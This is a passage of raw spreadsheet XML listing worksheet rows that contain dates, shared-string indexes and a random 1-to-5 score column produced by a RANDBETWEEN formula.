    <row r="29969" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29969" s="1">
        <v>42802.493020833332</v>
      </c>
      <c r="C29969" t="s">
        <v>60</v>
      </c>
      <c r="E29969" t="s">
        <v>27356</v>
      </c>
      <c r="F29969">
        <f t="shared" ca="1" si="468"/>
        <v>5</v>
      </c>
    </row>
    <row r="29970" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29970" s="1">
        <v>42802.490810185183</v>
      </c>
      <c r="C29970" t="s">
        <v>10</v>
      </c>
      <c r="D29970" t="s">
        <v>163</v>
      </c>
      <c r="E29970" t="s">
        <v>27357</v>
      </c>
      <c r="F29970">
        <f t="shared" ca="1" si="468"/>
        <v>5</v>
      </c>
    </row>
    <row r="29971" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A29971" s="1">
        <v>42802.462500000001</v>
      </c>
      <c r="C29971" t="s">
        <v>10</v>
      </c>
      <c r="D29971" t="s">
        <v>33</v>
      </c>
      <c r="E29971" s="2" t="s">
        <v>27358</v>
      </c>
      <c r="F29971">
        <f t="shared" ca="1" si="468"/>
        <v>5</v>
      </c>
    </row>
    <row r="29972" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29972" s="1">
        <v>42802.449421296296</v>
      </c>
      <c r="C29972" t="s">
        <v>124</v>
      </c>
      <c r="E29972" t="s">
        <v>27359</v>
      </c>
      <c r="F29972">
        <f t="shared" ca="1" si="468"/>
        <v>2</v>
      </c>
    </row>
    <row r="29973" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A29973" s="1">
        <v>42802.444525462961</v>
      </c>
      <c r="C29973" t="s">
        <v>29</v>
      </c>
      <c r="E29973" s="2" t="s">
        <v>27276</v>
      </c>
      <c r="F29973">
        <f t="shared" ca="1" si="468"/>
        <v>4</v>
      </c>
    </row>
    <row r="29974" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A29974" s="1">
        <v>42802.432905092595</v>
      </c>
      <c r="C29974" t="s">
        <v>10</v>
      </c>
      <c r="D29974" t="s">
        <v>667</v>
      </c>
      <c r="E29974" s="2" t="s">
        <v>27360</v>
      </c>
      <c r="F29974">
        <f t="shared" ca="1" si="468"/>
        <v>2</v>
      </c>
    </row>
    <row r="29975" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29975" s="1">
        <v>42802.431030092594</v>
      </c>
      <c r="C29975" t="s">
        <v>134</v>
      </c>
      <c r="E29975" t="s">
        <v>27361</v>
      </c>
      <c r="F29975">
        <f t="shared" ca="1" si="468"/>
        <v>2</v>
      </c>
    </row>
    <row r="29976" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A29976" s="1">
        <v>42802.406724537039</v>
      </c>
      <c r="C29976" t="s">
        <v>10</v>
      </c>
      <c r="D29976" t="s">
        <v>33</v>
      </c>
      <c r="E29976" s="2" t="s">
        <v>27358</v>
      </c>
      <c r="F29976">
        <f t="shared" ca="1" si="468"/>
        <v>3</v>
      </c>
    </row>
    <row r="29977" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A29977" s="1">
        <v>42802.390833333331</v>
      </c>
      <c r="C29977" t="s">
        <v>10</v>
      </c>
      <c r="D29977" t="s">
        <v>163</v>
      </c>
      <c r="E29977" s="2" t="s">
        <v>27362</v>
      </c>
      <c r="F29977">
        <f t="shared" ca="1" si="468"/>
        <v>1</v>
      </c>
    </row>
    <row r="29978" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29978" s="1">
        <v>42802.371423611112</v>
      </c>
      <c r="C29978" t="s">
        <v>10</v>
      </c>
      <c r="D29978" t="s">
        <v>20</v>
      </c>
      <c r="E29978" t="s">
        <v>27363</v>
      </c>
      <c r="F29978">
        <f t="shared" ca="1" si="468"/>
        <v>4</v>
      </c>
    </row>
    <row r="29979" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29979" s="1">
        <v>42802.353159722225</v>
      </c>
      <c r="C29979" t="s">
        <v>48</v>
      </c>
      <c r="E29979" t="s">
        <v>27364</v>
      </c>
      <c r="F29979">
        <f t="shared" ca="1" si="468"/>
        <v>4</v>
      </c>
    </row>
    <row r="29980" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29980" s="1">
        <v>42802.341307870367</v>
      </c>
      <c r="C29980" t="s">
        <v>124</v>
      </c>
      <c r="E29980" t="s">
        <v>27365</v>
      </c>
      <c r="F29980">
        <f t="shared" ca="1" si="468"/>
        <v>2</v>
      </c>
    </row>
    <row r="29981" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29981" s="1">
        <v>42802.284826388888</v>
      </c>
      <c r="C29981" t="s">
        <v>124</v>
      </c>
      <c r="E29981" t="s">
        <v>27366</v>
      </c>
      <c r="F29981">
        <f t="shared" ca="1" si="468"/>
        <v>5</v>
      </c>
    </row>
    <row r="29982" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A29982" s="1">
        <v>42802.218622685185</v>
      </c>
      <c r="C29982" t="s">
        <v>314</v>
      </c>
      <c r="E29982" s="2" t="s">
        <v>27367</v>
      </c>
      <c r="F29982">
        <f t="shared" ca="1" si="468"/>
        <v>2</v>
      </c>
    </row>
    <row r="29983" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29983" s="1">
        <v>42802.185937499999</v>
      </c>
      <c r="C29983" t="s">
        <v>344</v>
      </c>
      <c r="E29983" t="s">
        <v>27368</v>
      </c>
      <c r="F29983">
        <f t="shared" ca="1" si="468"/>
        <v>2</v>
      </c>
    </row>
    <row r="29984" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A29984" s="1">
        <v>42802.133912037039</v>
      </c>
      <c r="C29984" t="s">
        <v>69</v>
      </c>
      <c r="E29984" s="2" t="s">
        <v>27369</v>
      </c>
      <c r="F29984">
        <f t="shared" ca="1" si="468"/>
        <v>5</v>
      </c>
    </row>
    <row r="29985" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A29985" s="1">
        <v>42802.118622685186</v>
      </c>
      <c r="C29985" t="s">
        <v>229</v>
      </c>
      <c r="E29985" s="2" t="s">
        <v>27370</v>
      </c>
      <c r="F29985">
        <f t="shared" ca="1" si="468"/>
        <v>2</v>
      </c>
    </row>
    <row r="29986" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A29986" s="1">
        <v>42802.065960648149</v>
      </c>
      <c r="C29986" t="s">
        <v>166</v>
      </c>
      <c r="E29986" s="2" t="s">
        <v>27371</v>
      </c>
      <c r="F29986">
        <f t="shared" ca="1" si="468"/>
        <v>5</v>
      </c>
    </row>
    <row r="29987" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29987" s="1">
        <v>42802.051296296297</v>
      </c>
      <c r="C29987" t="s">
        <v>41</v>
      </c>
      <c r="E29987" t="s">
        <v>27372</v>
      </c>
      <c r="F29987">
        <f t="shared" ca="1" si="468"/>
        <v>1</v>
      </c>
    </row>
    <row r="29988" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A29988" s="1">
        <v>42801.972962962966</v>
      </c>
      <c r="C29988" t="s">
        <v>140</v>
      </c>
      <c r="E29988" s="2" t="s">
        <v>27373</v>
      </c>
      <c r="F29988">
        <f t="shared" ca="1" si="468"/>
        <v>1</v>
      </c>
    </row>
    <row r="29989" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29989" s="1">
        <v>42801.911354166667</v>
      </c>
      <c r="C29989" t="s">
        <v>10</v>
      </c>
      <c r="D29989" t="s">
        <v>163</v>
      </c>
      <c r="E29989" t="s">
        <v>27374</v>
      </c>
      <c r="F29989">
        <f t="shared" ca="1" si="468"/>
        <v>4</v>
      </c>
    </row>
    <row r="29990" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A29990" s="1">
        <v>42801.773298611108</v>
      </c>
      <c r="C29990" t="s">
        <v>50</v>
      </c>
      <c r="E29990" s="2" t="s">
        <v>27375</v>
      </c>
      <c r="F29990">
        <f t="shared" ca="1" si="468"/>
        <v>4</v>
      </c>
    </row>
    <row r="29991" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A29991" s="1">
        <v>42801.770983796298</v>
      </c>
      <c r="C29991" t="s">
        <v>50</v>
      </c>
      <c r="E29991" s="2" t="s">
        <v>27375</v>
      </c>
      <c r="F29991">
        <f t="shared" ca="1" si="468"/>
        <v>5</v>
      </c>
    </row>
    <row r="29992" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A29992" s="1">
        <v>42801.734201388892</v>
      </c>
      <c r="C29992" t="s">
        <v>10</v>
      </c>
      <c r="D29992" t="s">
        <v>107</v>
      </c>
      <c r="E29992" s="2" t="s">
        <v>27376</v>
      </c>
      <c r="F29992">
        <f t="shared" ca="1" si="468"/>
        <v>5</v>
      </c>
    </row>
    <row r="29993" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29993" s="1">
        <v>42801.731979166667</v>
      </c>
      <c r="C29993" t="s">
        <v>10</v>
      </c>
      <c r="D29993" t="s">
        <v>107</v>
      </c>
      <c r="F29993">
        <f t="shared" ca="1" si="468"/>
        <v>4</v>
      </c>
    </row>
    <row r="29994" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A29994" s="1">
        <v>42801.724999999999</v>
      </c>
      <c r="C29994" t="s">
        <v>10</v>
      </c>
      <c r="D29994" t="s">
        <v>89</v>
      </c>
      <c r="E29994" s="2" t="s">
        <v>27377</v>
      </c>
      <c r="F29994">
        <f t="shared" ca="1" si="468"/>
        <v>5</v>
      </c>
    </row>
    <row r="29995" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29995" s="1">
        <v>42801.693472222221</v>
      </c>
      <c r="C29995" t="s">
        <v>10</v>
      </c>
      <c r="D29995" t="s">
        <v>14</v>
      </c>
      <c r="E29995" t="s">
        <v>27378</v>
      </c>
      <c r="F29995">
        <f t="shared" ca="1" si="468"/>
        <v>2</v>
      </c>
    </row>
    <row r="29996" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29996" s="1">
        <v>42801.651250000003</v>
      </c>
      <c r="C29996" t="s">
        <v>10</v>
      </c>
      <c r="D29996" t="s">
        <v>52</v>
      </c>
      <c r="E29996" t="s">
        <v>27379</v>
      </c>
      <c r="F29996">
        <f t="shared" ca="1" si="468"/>
        <v>4</v>
      </c>
    </row>
    <row r="29997" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29997" s="1">
        <v>42801.648518518516</v>
      </c>
      <c r="C29997" t="s">
        <v>10</v>
      </c>
      <c r="D29997" t="s">
        <v>6</v>
      </c>
      <c r="E29997" t="s">
        <v>27380</v>
      </c>
      <c r="F29997">
        <f t="shared" ca="1" si="468"/>
        <v>1</v>
      </c>
    </row>
    <row r="29998" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A29998" s="1">
        <v>42801.637303240743</v>
      </c>
      <c r="C29998" t="s">
        <v>10</v>
      </c>
      <c r="D29998" t="s">
        <v>36</v>
      </c>
      <c r="E29998" s="2" t="s">
        <v>27381</v>
      </c>
      <c r="F29998">
        <f t="shared" ca="1" si="468"/>
        <v>3</v>
      </c>
    </row>
    <row r="29999" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A29999" s="1">
        <v>42801.636423611111</v>
      </c>
      <c r="C29999" t="s">
        <v>10</v>
      </c>
      <c r="D29999" t="s">
        <v>56</v>
      </c>
      <c r="E29999" s="2" t="s">
        <v>27382</v>
      </c>
      <c r="F29999">
        <f t="shared" ca="1" si="468"/>
        <v>1</v>
      </c>
    </row>
    <row r="30000" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A30000" s="1">
        <v>42801.603761574072</v>
      </c>
      <c r="C30000" t="s">
        <v>231</v>
      </c>
      <c r="F30000">
        <f t="shared" ca="1" si="468"/>
        <v>5</v>
      </c>
    </row>
    <row r="30001" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A30001" s="1">
        <v>42801.603483796294</v>
      </c>
      <c r="C30001" t="s">
        <v>231</v>
      </c>
      <c r="F30001">
        <f t="shared" ca="1" si="468"/>
        <v>2</v>
      </c>
    </row>
    <row r="30002" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A30002" s="1">
        <v>42801.602951388886</v>
      </c>
      <c r="C30002" t="s">
        <v>231</v>
      </c>
      <c r="F30002">
        <f t="shared" ca="1" si="468"/>
        <v>2</v>
      </c>
    </row>
    <row r="30003" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A30003" s="1">
        <v>42801.580671296295</v>
      </c>
      <c r="C30003" t="s">
        <v>10</v>
      </c>
      <c r="D30003" t="s">
        <v>6</v>
      </c>
      <c r="E30003" s="2" t="s">
        <v>27383</v>
      </c>
      <c r="F30003">
        <f t="shared" ca="1" si="468"/>
        <v>1</v>
      </c>
    </row>
    <row r="30004" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A30004" s="1">
        <v>42801.579004629632</v>
      </c>
      <c r="C30004" t="s">
        <v>6</v>
      </c>
      <c r="D30004" t="s">
        <v>25</v>
      </c>
      <c r="E30004" t="s">
        <v>27384</v>
      </c>
      <c r="F30004">
        <f t="shared" ca="1" si="468"/>
        <v>1</v>
      </c>
    </row>
    <row r="30005" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A30005" s="1">
        <v>42801.570671296293</v>
      </c>
      <c r="C30005" t="s">
        <v>16</v>
      </c>
      <c r="E30005" s="2" t="s">
        <v>27385</v>
      </c>
      <c r="F30005">
        <f t="shared" ca="1" si="468"/>
        <v>3</v>
      </c>
    </row>
    <row r="30006" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A30006" s="1">
        <v>42801.569039351853</v>
      </c>
      <c r="C30006" t="s">
        <v>10</v>
      </c>
      <c r="D30006" t="s">
        <v>52</v>
      </c>
      <c r="E30006" s="2" t="s">
        <v>27386</v>
      </c>
      <c r="F30006">
        <f t="shared" ca="1" si="468"/>
        <v>4</v>
      </c>
    </row>
    <row r="30007" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A30007" s="1">
        <v>42801.557974537034</v>
      </c>
      <c r="C30007" t="s">
        <v>6</v>
      </c>
      <c r="D30007" t="s">
        <v>821</v>
      </c>
      <c r="E30007" t="s">
        <v>27387</v>
      </c>
      <c r="F30007">
        <f t="shared" ca="1" si="468"/>
        <v>5</v>
      </c>
    </row>
    <row r="30008" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A30008" s="1">
        <v>42801.554247685184</v>
      </c>
      <c r="C30008" t="s">
        <v>6</v>
      </c>
      <c r="D30008" t="s">
        <v>821</v>
      </c>
      <c r="E30008" t="s">
        <v>27388</v>
      </c>
      <c r="F30008">
        <f t="shared" ca="1" si="468"/>
        <v>1</v>
      </c>
    </row>
    <row r="30009" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A30009" s="1">
        <v>42801.548564814817</v>
      </c>
      <c r="C30009" t="s">
        <v>10</v>
      </c>
      <c r="D30009" t="s">
        <v>39</v>
      </c>
      <c r="E30009" t="s">
        <v>27389</v>
      </c>
      <c r="F30009">
        <f t="shared" ca="1" si="468"/>
        <v>5</v>
      </c>
    </row>
    <row r="30010" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A30010" s="1">
        <v>42801.536064814813</v>
      </c>
      <c r="C30010" t="s">
        <v>10</v>
      </c>
      <c r="D30010" t="s">
        <v>86</v>
      </c>
      <c r="E30010" t="s">
        <v>27390</v>
      </c>
      <c r="F30010">
        <f t="shared" ca="1" si="468"/>
        <v>1</v>
      </c>
    </row>
    <row r="30011" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A30011" s="1">
        <v>42801.532800925925</v>
      </c>
      <c r="C30011" t="s">
        <v>10</v>
      </c>
      <c r="D30011" t="s">
        <v>6</v>
      </c>
      <c r="E30011" t="s">
        <v>27391</v>
      </c>
      <c r="F30011">
        <f t="shared" ca="1" si="468"/>
        <v>4</v>
      </c>
    </row>
    <row r="30012" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A30012" s="1">
        <v>42801.510358796295</v>
      </c>
      <c r="C30012" t="s">
        <v>10</v>
      </c>
      <c r="D30012" t="s">
        <v>71</v>
      </c>
      <c r="E30012" s="2" t="s">
        <v>27392</v>
      </c>
      <c r="F30012">
        <f t="shared" ca="1" si="468"/>
        <v>4</v>
      </c>
    </row>
    <row r="30013" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A30013" s="1">
        <v>42801.494699074072</v>
      </c>
      <c r="C30013" t="s">
        <v>10</v>
      </c>
      <c r="D30013" t="s">
        <v>11</v>
      </c>
      <c r="E30013" s="2" t="s">
        <v>27393</v>
      </c>
      <c r="F30013">
        <f t="shared" ca="1" si="468"/>
        <v>3</v>
      </c>
    </row>
    <row r="30014" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A30014" s="1">
        <v>42801.461863425924</v>
      </c>
      <c r="C30014" t="s">
        <v>6</v>
      </c>
      <c r="D30014" t="s">
        <v>821</v>
      </c>
      <c r="E30014" s="2" t="s">
        <v>27394</v>
      </c>
      <c r="F30014">
        <f t="shared" ca="1" si="468"/>
        <v>3</v>
      </c>
    </row>
    <row r="30015" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A30015" s="1">
        <v>42801.435543981483</v>
      </c>
      <c r="C30015" t="s">
        <v>10</v>
      </c>
      <c r="D30015" t="s">
        <v>20</v>
      </c>
      <c r="E30015" t="s">
        <v>27395</v>
      </c>
      <c r="F30015">
        <f t="shared" ca="1" si="468"/>
        <v>5</v>
      </c>
    </row>
    <row r="30016" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A30016" s="1">
        <v>42801.427800925929</v>
      </c>
      <c r="C30016" t="s">
        <v>10</v>
      </c>
      <c r="D30016" t="s">
        <v>17</v>
      </c>
      <c r="E30016" t="s">
        <v>27396</v>
      </c>
      <c r="F30016">
        <f t="shared" ca="1" si="468"/>
        <v>5</v>
      </c>
    </row>
    <row r="30017" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A30017" s="1">
        <v>42801.418969907405</v>
      </c>
      <c r="C30017" t="s">
        <v>10</v>
      </c>
      <c r="D30017" t="s">
        <v>6</v>
      </c>
      <c r="E30017" t="s">
        <v>27397</v>
      </c>
      <c r="F30017">
        <f t="shared" ca="1" si="468"/>
        <v>5</v>
      </c>
    </row>
    <row r="30018" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A30018" s="1">
        <v>42801.41201388889</v>
      </c>
      <c r="C30018" t="s">
        <v>10</v>
      </c>
      <c r="D30018" t="s">
        <v>52</v>
      </c>
      <c r="E30018" t="s">
        <v>27398</v>
      </c>
      <c r="F30018">
        <f t="shared" ref="F30018:F30072" ca="1" si="469">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="30019" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A30019" s="1">
        <v>42801.410949074074</v>
      </c>
      <c r="C30019" t="s">
        <v>10</v>
      </c>
      <c r="D30019" t="s">
        <v>36</v>
      </c>
      <c r="E30019" t="s">
        <v>27399</v>
      </c>
      <c r="F30019">
        <f t="shared" ca="1" si="469"/>
        <v>2</v>
      </c>
    </row>
    <row r="30020" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A30020" s="1">
        <v>42801.355474537035</v>
      </c>
      <c r="C30020" t="s">
        <v>60</v>
      </c>
      <c r="E30020" t="s">
        <v>27400</v>
      </c>
      <c r="F30020">
        <f t="shared" ca="1" si="469"/>
        <v>4</v>
      </c>
    </row>
    <row r="30021" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A30021" s="1">
        <v>42801.304444444446</v>
      </c>
      <c r="C30021" t="s">
        <v>48</v>
      </c>
      <c r="E30021" s="2" t="s">
        <v>27401</v>
      </c>
      <c r="F30021">
        <f t="shared" ca="1" si="469"/>
        <v>2</v>
      </c>
    </row>
    <row r="30022" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A30022" s="1">
        <v>42801.262685185182</v>
      </c>
      <c r="C30022" t="s">
        <v>41</v>
      </c>
      <c r="E30022" s="2" t="s">
        <v>27402</v>
      </c>
      <c r="F30022">
        <f t="shared" ca="1" si="469"/>
        <v>5</v>
      </c>
    </row>
    <row r="30023" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A30023" s="1">
        <v>42801.258483796293</v>
      </c>
      <c r="C30023" t="s">
        <v>65</v>
      </c>
      <c r="E30023" t="s">
        <v>27403</v>
      </c>
      <c r="F30023">
        <f t="shared" ca="1" si="469"/>
        <v>3</v>
      </c>
    </row>
    <row r="30024" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A30024" s="1">
        <v>42801.248900462961</v>
      </c>
      <c r="C30024" t="s">
        <v>17</v>
      </c>
      <c r="E30024" t="s">
        <v>27404</v>
      </c>
      <c r="F30024">
        <f t="shared" ca="1" si="469"/>
        <v>5</v>
      </c>
    </row>
    <row r="30025" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A30025" s="1">
        <v>42801.23133101852</v>
      </c>
      <c r="C30025" t="s">
        <v>41</v>
      </c>
      <c r="E30025" t="s">
        <v>27405</v>
      </c>
      <c r="F30025">
        <f t="shared" ca="1" si="469"/>
        <v>3</v>
      </c>
    </row>
    <row r="30026" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A30026" s="1">
        <v>42801.196504629632</v>
      </c>
      <c r="C30026" t="s">
        <v>65</v>
      </c>
      <c r="E30026" s="2" t="s">
        <v>27406</v>
      </c>
      <c r="F30026">
        <f t="shared" ca="1" si="469"/>
        <v>1</v>
      </c>
    </row>
    <row r="30027" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A30027" s="1">
        <v>42801.147314814814</v>
      </c>
      <c r="C30027" t="s">
        <v>103</v>
      </c>
      <c r="E30027" s="2" t="s">
        <v>27407</v>
      </c>
      <c r="F30027">
        <f t="shared" ca="1" si="469"/>
        <v>5</v>
      </c>
    </row>
    <row r="30028" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A30028" s="1">
        <v>42801.110254629632</v>
      </c>
      <c r="C30028" t="s">
        <v>319</v>
      </c>
      <c r="E30028" s="2" t="s">
        <v>27408</v>
      </c>
      <c r="F30028">
        <f t="shared" ca="1" si="469"/>
        <v>5</v>
      </c>
    </row>
    <row r="30029" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A30029" s="1">
        <v>42801.08829861111</v>
      </c>
      <c r="C30029" t="s">
        <v>140</v>
      </c>
      <c r="E30029" t="s">
        <v>21939</v>
      </c>
      <c r="F30029">
        <f t="shared" ca="1" si="469"/>
        <v>2</v>
      </c>
    </row>
    <row r="30030" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A30030" s="1">
        <v>42801.037210648145</v>
      </c>
      <c r="C30030" t="s">
        <v>253</v>
      </c>
      <c r="E30030" s="2" t="s">
        <v>27409</v>
      </c>
      <c r="F30030">
        <f t="shared" ca="1" si="469"/>
        <v>2</v>
      </c>
    </row>
    <row r="30031" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A30031" s="1">
        <v>42801.031585648147</v>
      </c>
      <c r="C30031" t="s">
        <v>471</v>
      </c>
      <c r="E30031" t="s">
        <v>27410</v>
      </c>
      <c r="F30031">
        <f t="shared" ca="1" si="469"/>
        <v>2</v>
      </c>
    </row>
    <row r="30032" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A30032" s="1">
        <v>42801.025150462963</v>
      </c>
      <c r="C30032" t="s">
        <v>41</v>
      </c>
      <c r="E30032" s="2" t="s">
        <v>27411</v>
      </c>
      <c r="F30032">
        <f t="shared" ca="1" si="469"/>
        <v>2</v>
      </c>
    </row>
    <row r="30033" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A30033" s="1">
        <v>42801.024525462963</v>
      </c>
      <c r="C30033" t="s">
        <v>41</v>
      </c>
      <c r="E30033" s="2" t="s">
        <v>27411</v>
      </c>
      <c r="F30033">
        <f t="shared" ca="1" si="469"/>
        <v>3</v>
      </c>
    </row>
    <row r="30034" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A30034" s="1">
        <v>42800.886053240742</v>
      </c>
      <c r="C30034" t="s">
        <v>339</v>
      </c>
      <c r="E30034" t="s">
        <v>27412</v>
      </c>
      <c r="F30034">
        <f t="shared" ca="1" si="469"/>
        <v>1</v>
      </c>
    </row>
    <row r="30035" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A30035" s="1">
        <v>42800.882928240739</v>
      </c>
      <c r="C30035" t="s">
        <v>10</v>
      </c>
      <c r="D30035" t="s">
        <v>6</v>
      </c>
      <c r="E30035" s="2" t="s">
        <v>27413</v>
      </c>
      <c r="F30035">
        <f t="shared" ca="1" si="469"/>
        <v>5</v>
      </c>
    </row>
    <row r="30036" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A30036" s="1">
        <v>42800.784201388888</v>
      </c>
      <c r="C30036" t="s">
        <v>10</v>
      </c>
      <c r="D30036" t="s">
        <v>17</v>
      </c>
      <c r="E30036" t="s">
        <v>27414</v>
      </c>
      <c r="F30036">
        <f t="shared" ca="1" si="469"/>
        <v>2</v>
      </c>
    </row>
    <row r="30037" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A30037" s="1">
        <v>42800.775868055556</v>
      </c>
      <c r="C30037" t="s">
        <v>10</v>
      </c>
      <c r="D30037" t="s">
        <v>6</v>
      </c>
      <c r="E30037" s="2" t="s">
        <v>27415</v>
      </c>
      <c r="F30037">
        <f t="shared" ca="1" si="469"/>
        <v>1</v>
      </c>
    </row>
    <row r="30038" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A30038" s="1">
        <v>42800.725937499999</v>
      </c>
      <c r="C30038" t="s">
        <v>65</v>
      </c>
      <c r="E30038" s="2" t="s">
        <v>27416</v>
      </c>
      <c r="F30038">
        <f t="shared" ca="1" si="469"/>
        <v>5</v>
      </c>
    </row>
    <row r="30039" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A30039" s="1">
        <v>42800.716921296298</v>
      </c>
      <c r="C30039" t="s">
        <v>10</v>
      </c>
      <c r="D30039" t="s">
        <v>158</v>
      </c>
      <c r="E30039" t="s">
        <v>27417</v>
      </c>
      <c r="F30039">
        <f t="shared" ca="1" si="469"/>
        <v>2</v>
      </c>
    </row>
    <row r="30040" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A30040" s="1">
        <v>42800.712384259263</v>
      </c>
      <c r="C30040" t="s">
        <v>10</v>
      </c>
      <c r="D30040" t="s">
        <v>89</v>
      </c>
      <c r="E30040" t="s">
        <v>27418</v>
      </c>
      <c r="F30040">
        <f t="shared" ca="1" si="469"/>
        <v>5</v>
      </c>
    </row>
    <row r="30041" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A30041" s="1">
        <v>42800.711192129631</v>
      </c>
      <c r="C30041" t="s">
        <v>10</v>
      </c>
      <c r="D30041" t="s">
        <v>178</v>
      </c>
      <c r="E30041" s="2" t="s">
        <v>27419</v>
      </c>
      <c r="F30041">
        <f t="shared" ca="1" si="469"/>
        <v>4</v>
      </c>
    </row>
    <row r="30042" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A30042" s="1">
        <v>42800.711180555554</v>
      </c>
      <c r="C30042" t="s">
        <v>10</v>
      </c>
      <c r="D30042" t="s">
        <v>178</v>
      </c>
      <c r="E30042" s="2" t="s">
        <v>27419</v>
      </c>
      <c r="F30042">
        <f t="shared" ca="1" si="469"/>
        <v>4</v>
      </c>
    </row>
    <row r="30043" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A30043" s="1">
        <v>42800.662951388891</v>
      </c>
      <c r="C30043" t="s">
        <v>231</v>
      </c>
      <c r="E30043" t="s">
        <v>27420</v>
      </c>
      <c r="F30043">
        <f t="shared" ca="1" si="469"/>
        <v>3</v>
      </c>
    </row>
    <row r="30044" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A30044" s="1">
        <v>42800.661585648151</v>
      </c>
      <c r="C30044" t="s">
        <v>6</v>
      </c>
      <c r="D30044" t="s">
        <v>25</v>
      </c>
      <c r="E30044" t="s">
        <v>4321</v>
      </c>
      <c r="F30044">
        <f t="shared" ca="1" si="469"/>
        <v>2</v>
      </c>
    </row>
    <row r="30045" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A30045" s="1">
        <v>42800.659525462965</v>
      </c>
      <c r="C30045" t="s">
        <v>10</v>
      </c>
      <c r="D30045" t="s">
        <v>36</v>
      </c>
      <c r="E30045" s="2" t="s">
        <v>27421</v>
      </c>
      <c r="F30045">
        <f t="shared" ca="1" si="469"/>
        <v>5</v>
      </c>
    </row>
    <row r="30046" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A30046" s="1">
        <v>42800.652407407404</v>
      </c>
      <c r="C30046" t="s">
        <v>10</v>
      </c>
      <c r="D30046" t="s">
        <v>46</v>
      </c>
      <c r="E30046" t="s">
        <v>27422</v>
      </c>
      <c r="F30046">
        <f t="shared" ca="1" si="469"/>
        <v>5</v>
      </c>
    </row>
    <row r="30047" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A30047" s="1">
        <v>42800.651990740742</v>
      </c>
      <c r="C30047" t="s">
        <v>10</v>
      </c>
      <c r="D30047" t="s">
        <v>993</v>
      </c>
      <c r="E30047" t="s">
        <v>27423</v>
      </c>
      <c r="F30047">
        <f t="shared" ca="1" si="469"/>
        <v>5</v>
      </c>
    </row>
    <row r="30048" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A30048" s="1">
        <v>42800.642523148148</v>
      </c>
